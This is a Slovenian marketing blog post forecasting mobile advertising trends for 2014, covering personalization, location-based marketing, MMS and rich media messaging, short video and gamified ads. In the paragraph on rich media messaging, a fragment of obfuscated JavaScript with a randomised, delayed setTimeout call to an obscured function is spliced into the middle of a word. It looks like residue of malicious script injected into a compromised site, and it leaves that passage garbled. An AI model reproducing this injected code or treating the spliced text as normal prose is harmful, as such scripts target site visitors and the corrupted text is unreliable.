fbpx

Trendi mobilnega oglaševanja v letu 2014

Trendi mobilnega oglaševanja v letu 2014

Leto 2013

Je bilo leto, ko je mnogo podjetij spoznalo potencial mobilnih naprav. Tablični računalniki in pametni mobilniki so bolj popularni kot kadarkoli prej.

Uporabnikom omogočajo, da naredijo več in niso več odvisni od fizične lokacije. Rast v sektorju mobilnih naprav je bila v zadnjih dveh letih impresivna in nič ne kaže na to, da bi bilo v naslednjih letih kaj drugače. Ponudniki telekomunikacijskih storitev namreč vlagajo ogromno sredstev v izgradnjo infrastrukture naslednje generacije.

Ob takšnem številu mobilnih uporabnikov je mobilna strategija postala tako pomembna, da je preprosto ne moremo zanemariti.

Mobilne naprave se vse pogosteje uporabljajo za iskanje, primerjanje, raziskovanje in ocenjevanje izdelkov in storitev. Mnogo analitikov pa je prepričanih, da bo leto 2014 še bolj pomembno za vse, kar je povezano z mobilnimi napravami. Potrošniki ne samo, da bodo vse več raziskovali in primerjali izdelke na svojih mobilnih napravah, ampak bodo na njih tudi vse več nakupovali.

In tukaj se poraja vprašanje, kaj bodo torej najbolj dominantni trendi na področju mobilnega marketinga v letu 2014 in 2015?

Trendi v letu 2014

Personalizacija

Prav gotovo bomo videli nadaljnji razvoj mnogo tistih, ki so se pojavili že v letu 2013. Sem spada osredotočenje na ciljnega kupca z uporabo z personalizacije. Da bi »pretvorili« iskalce naših storitev v kupce tako na mobilnih napravah kot tudi v spletnih trgovinah, moramo v letu 2014 še naprej vlagati čas in resurse v pripravo zelo personalizirane ponudbe, ki je čim bolj relevantna za tistega, ki jo išče.

Lokacijski marketing

Naslednji trend, ki bo zelo napredoval v letu 2014 pa je lokacijsko usmerjen marketing. Ciljanje strank z relevantnimi vsebinami medtem, ko se le te nahajajo na primerni lokaciji, bo naredilo mobilni marketing dosti bolj relevanten in precej manj vsiljiv. Socialna omrežja bodo predstavljala glavni kanal za lokacijski marketing v realnem času in bodo ponudila ustrezna orodja za dosego tega cilja. V letu 2014 naj bi se vse več trgovcev pričelo posluževati tudi funkcij kot so »najdi v trgovini« ali »preveri zalogo« in jih vključili v mobilne/spletne aplikacije.

Tako bo lahko potrošnik v fizični trgovini pobrskal po mobilni aplikaciji trgovca, aplikacija pa ga bo sproti obveščala, kje v trgovini se iskani artikel nahaja.

MMS in RMM

SMS (Short Message Service) že nekaj časa dominira kot primarni medij za tekstovno oglaševanje na mobilnih napravah. Ampak vse to, se bo v letu 2014 spremenilo. Napovedi so, da bo v ospredje stopila uporaba MMS (Multimedia Messaging Service) sporočil, za katera trenutno opažamo povečanje uporabe za približno 40% letno ter uporaba RMM (Rich Media Messaging) sporočil. MMS omogoča uporabo slik, video posnetkov ter daljših tekstovnih sporočil, ampak ima pomanjkljivosti.

Kot rešitev za pomanjkljivosti MMS je nastal RMM in takoj postavil višje standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andarde in pričakovanja med oglaševalci. Stopnja ogledov RMM sporočil je namreč neverjetnih 97%, poleg tega pa ima kar dvakrat tolikšno stopnjo konverzije (35%), kot recimo SMS. Glavni razlog za povečanje uporabe RMM sporočil pa je ta, da se RMM sporočilo prilagaja specifičnemu tipu naprave, ki ga je prejela. Tako se recimo uporabnikom Android naprav ne bo več potrebno ukvarjati z vsebinami, za ogled katerih bi potrebovali iPhone.

Z razširitvijo uporabe RMM sporočil bodo mobilni uporabniki prejemali vsebine, ki so popolnoma prilagojene za ogled na njihovi napravi.

Kratka sporočila in video posnetki

Naslednji izmed trendov je, da bodo sporočila še naprej postajala vse krajša in se kot takšna lepše prikazovala na mobilnih napravah. Skrajšali bi se naj tudi video posnetki, ki bi naj bili dolžine do nekaj sekund (6s).

Točkovanje

Ljudje smo bitja, ki so že po naravi tekmovalna. V letu 2014 bodo tako v ospredje stopili mobilni oglasi, ki bodo to tekmovalnost dodobra izkoristili. Vse bolj se bodo namreč pojavljali oglasi, ki bodo z točkovanjem/tekmovalnostjo vzpodbujali konverzije.

Sklep

Napovedi za leto 2014 so torej takšne, da bo to leto mobilnih naprav/tehnologij. In čeprav je bilo v zadnjih letih zaznati impresivno rast mobilnega ekosistema, pa novi poslovni modeli obljubljajo, da bo leto 2014 za mobilno podjetništvo izjemno.

V letu 2014 se bodo podjetja morala prilagoditi tem trendom in sprejeti nove načine interakcije z potrošniki.

Če torej povzamemo, leto 2014 bo prav gotovo zelo vznemirljivo leto.

0 Komentarjev

Odgovori

Vaš e-naslov ne bo objavljen. * označuje zahtevana polja

*